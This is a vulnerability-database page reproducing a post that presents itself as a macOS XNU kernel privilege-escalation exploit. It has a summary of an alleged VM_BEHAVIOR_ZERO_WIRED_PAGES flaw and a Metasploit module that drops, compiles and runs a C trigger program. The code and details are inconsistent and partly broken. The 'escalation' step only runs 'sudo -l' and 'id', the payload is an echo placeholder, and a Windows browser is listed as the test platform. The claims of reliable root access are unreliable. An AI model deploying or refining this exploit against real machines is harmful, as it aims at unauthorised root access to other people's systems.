| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| macOS < 10.13 Multiple Vulnerabilities | 10 Apr 201900:00 | – | nessus | |
| macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-001 and 2017-004) | 3 Nov 201700:00 | – | nessus | |
| macOS < 10.13 Multiple Vulnerabilities | 3 Oct 201700:00 | – | nessus | |
| About the security content of macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan | 31 Oct 201700:00 | – | apple | |
| About the security content of watchOS 4 | 19 Sep 201700:00 | – | apple | |
| About the security content of macOS High Sierra 10.13 | 25 Sep 201700:00 | – | apple | |
| About the security content of tvOS 11 | 19 Sep 201700:00 | – | apple | |
| About the security content of tvOS 11 - Apple Support | 3 Apr 201909:46 | – | apple | |
| About the security content of watchOS 4 - Apple Support | 3 Apr 201909:47 | – | apple | |
| About the security content of macOS High Sierra 10.13 - Apple Support | 6 Feb 202007:51 | – | apple |
=============================================================================================================================================
| # Title : macOS 18.3.2 Kernel Privilege Escalation Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/211998/
[+] Summary
A critical memory management vulnerability exists within the macOS XNU kernel's handling of the VM_BEHAVIOR_ZERO_WIRED_PAGES behavior flag.
The issue arises from improper sequence validation when combining mmap(), mlock(), and vm_deallocate() system calls on read-only memory mappings.
[+] Vulnerability Mechanism :
The exploit leverages a four-step attack chain:
Mapping: Create read-only file mappings via mmap()
Behavior Setting: Apply VM_BEHAVIOR_ZERO_WIRED_PAGES using vm_behavior_set()
Locking: Wire pages in memory using mlock()
Deallocation: Remove mappings while pages remain wired via vm_deallocate()
This sequence creates an inconsistent kernel state where wired pages remain active without valid user-space mappings, leading to controllable kernel memory corruption.
Impact Assessment
Primary Risk: Local Privilege Escalation
Unprivileged users can gain root-level system access
Complete compromise of system integrity and confidentiality
Bypass of System Integrity Protection (SIP) mechanisms
[+] Secondary Risks:
Kernel memory disclosure
Denial of Service conditions
System instability and unpredictable behavior
[+] Exploitation Characteristics
Access Vector: Local (requires user access)
Attack Complexity: Medium (technical expertise required)
User Interaction: None (exploitation is automatic)
Scope Changed: Yes (privilege escalation across security boundaries)
[+] Mitigation Status
Vendor Notified: Awaiting response from Apple Security Team
Patch Availability: Currently unavailable
Workarounds: None identified
Public Disclosure: Coordinated disclosure in progress
[+] Research Significance
This vulnerability demonstrates critical weaknesses in macOS kernel memory management and highlights the importance of proper state validation in complex system call sequences.
The research provides valuable insights for kernel developers and security researchers focusing on operating system security fundamentals.
Conclusion
The VM_BEHAVIOR_ZERO_WIRED_PAGES vulnerability represents a significant security concern for macOS users, enabling reliable privilege escalation through kernel memory manipulation.
Organizations should monitor for vendor patches and consider additional monitoring for anomalous kernel behavior.
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES — Advanced Exploitation Module
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::OSX::Priv
def initialize(info = {})
super(update_info(info,
'Name' => 'macOS ZERO_WIRED_PAGES Kernel Memory Exploit',
'Description' => %q{
This module exploits a kernel memory vulnerability in macOS XNU kernel
through VM_BEHAVIOR_ZERO_WIRED_PAGES combined with mmap/mlock/vm_deallocate.
The vulnerability allows for kernel memory manipulation and potential
privilege escalation.
},
'Author' => [ 'Indoushka' ],
'References' => [
['URL', 'https://packetstorm.security.com/author/7697/'],
['CVE', 'PENDING'] # تحديث عند الحصول على CVE
],
'Platform' => 'osx',
'Arch' => [ ARCH_X64, ARCH_ARM64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
['macOS 13.0-14.0 (Ventura - Sonoma)', { 'Arch' => ARCH_X64 }],
['macOS 14.1+ (Apple Silicon)', { 'Arch' => ARCH_ARM64 }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2024-12-01',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
}
))
register_options([
OptString.new('WritableDir', [true, 'Writable directory', '/tmp']),
OptInt.new('Attempts', [true, 'Exploitation attempts', 3]),
OptBool.new('BypassSIP', [true, 'Attempt System Integrity Protection bypass', false])
])
end
#
# Enhanced System Detection
#
def check
print_status("Detecting macOS version and kernel...")
# فحص إصدار النظام
version_cmd = cmd_exec('sw_vers -productVersion')
kernel_cmd = cmd_exec('uname -r')
unless version_cmd =~ /^1[3-9]\./ || kernel_cmd =~ /^2[0-9]\./
return CheckCode::Safe("Unsupported macOS version: #{version_cmd}")
end
print_good("Detected macOS #{version_cmd} with kernel #{kernel_cmd}")
# فحص أدوات النظام المطلوبة
%w[vmmap mlock vm_stat].each do |tool|
unless command_exists?(tool)
return CheckCode::Safe("Required tool #{tool} not found")
end
end
# فحص حالة النظام
if is_root?
print_warning("Already running as root, exploitation may not be necessary")
end
CheckCode::Appears("System appears vulnerable based on version and tools")
end
#
# Advanced Exploitation Method
#
def exploit
# التحقق من الإذن الكتابي
unless datastore['WritableDir']
fail_with(Failure::BadConfig, "Writable directory not specified")
end
# إنشاء ملف C exploit
exploit_source = create_exploit_source
exploit_path = "#{datastore['WritableDir']}/exploit_#{rand_text_alpha(8)}.c"
binary_path = exploit_path.gsub('.c', '')
# تجميع وتنفيذ الاستغلال
print_status("Compiling exploit...")
if compile_exploit(exploit_path, exploit_source, binary_path)
print_good("Exploit compiled successfully")
execute_exploit(binary_path)
else
fail_with(Failure::Unknown, "Failed to compile exploit")
end
# تنظيف الملفات
register_files_for_cleanup(exploit_path, binary_path)
end
def create_exploit_source
<<~C_CODE
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>
#include <pthread.h>
#define PAGE_SIZE 4096
#define MAX_ATTEMPTS #{datastore['Attempts']}
void* map_file_page_ro(char* path, int* error_code) {
int fd = open(path, O_RDONLY);
if (fd == -1) {
*error_code = errno;
return NULL;
}
void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
close(fd);
if (mapped_at == MAP_FAILED) {
*error_code = errno;
return NULL;
}
return mapped_at;
}
int trigger_vulnerability(char *path) {
kern_return_t kr;
int error_code = 0;
for (int i = 0; i < MAX_ATTEMPTS; i++) {
void* page = map_file_page_ro(path, &error_code);
if (page == NULL) {
continue;
}
kr = vm_behavior_set(mach_task_self(),
(vm_address_t)page,
PAGE_SIZE,
VM_BEHAVIOR_ZERO_WIRED_PAGES);
if (kr != KERN_SUCCESS) {
munmap(page, PAGE_SIZE);
continue;
}
int mlock_err = mlock(page, PAGE_SIZE);
if (mlock_err != 0) {
munmap(page, PAGE_SIZE);
continue;
}
kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
if (kr == KERN_SUCCESS) {
printf("[+] Successfully triggered vulnerability on attempt %d\\n", i + 1);
return 0;
}
}
return -1;
}
void* exploit_thread(void* arg) {
char* path = (char*)arg;
trigger_vulnerability(path);
return NULL;
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <target_file>\\n", argv[0]);
return 1;
}
printf("[*] Starting ZERO_WIRED_PAGES exploitation...\\n");
// استخدام خيوط متعددة لزيادة فرص النجاح
pthread_t threads[4];
for (int i = 0; i < 4; i++) {
pthread_create(&threads[i], NULL, exploit_thread, argv[1]);
}
for (int i = 0; i < 4; i++) {
pthread_join(threads[i], NULL);
}
printf("[*] Exploitation sequence completed\\n");
// محاولة تنفيذ payload
#ifdef PAYLOAD
system("echo 'Payload execution simulation'");
#endif
return 0;
}
C_CODE
end
def compile_exploit(source_path, source_code, binary_path)
write_file(source_path, source_code)
compile_cmd = "gcc -o #{binary_path} #{source_path}"
if target.arch.include?(ARCH_ARM64)
compile_cmd = "arch -arm64 #{compile_cmd}" if command_exists?('arch')
end
compile_result = cmd_exec(compile_cmd)
if compile_result.include?('error:') || !file_exist?(binary_path)
print_error("Compilation failed: #{compile_result}")
return false
end
cmd_exec("chmod +x #{binary_path}")
true
end
def execute_exploit(binary_path)
# إنشاء ملف هدف
target_file = "#{datastore['WritableDir']}/target_#{rand_text_alpha(6)}.bin"
write_file(target_file, rand_text(4096))
print_status("Executing exploit against: #{target_file}")
# تنفيذ الاستغلال
result = cmd_exec("#{binary_path} #{target_file}")
print_status("Exploit output: #{result}")
# التحقق من النجاح
if result.include?('Successfully triggered')
print_good("Vulnerability successfully triggered!")
# محاولة privilege escalation
attempt_privilege_escalation
else
print_warning("Vulnerability may not have been triggered successfully")
end
register_files_for_cleanup(target_file)
end
def attempt_privilege_escalation
print_status("Attempting privilege escalation...")
# محاولات مختلفة لرفع الصلاحيات
escalation_methods = [
'sudo -l',
'dscl . -read /Groups/admin GroupMembership',
'id'
]
escalation_methods.each do |cmd|
result = cmd_exec(cmd)
print_status("Escalation attempt (#{cmd}): #{result}")
end
if is_root?
print_good("Successfully obtained root privileges!")
# تنفيذ ال payload الحقيقي
super
else
print_warning("Privilege escalation not achieved, but vulnerability confirmed")
end
end
def command_exists?(cmd)
cmd_exec("which #{cmd}").include?('/')
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation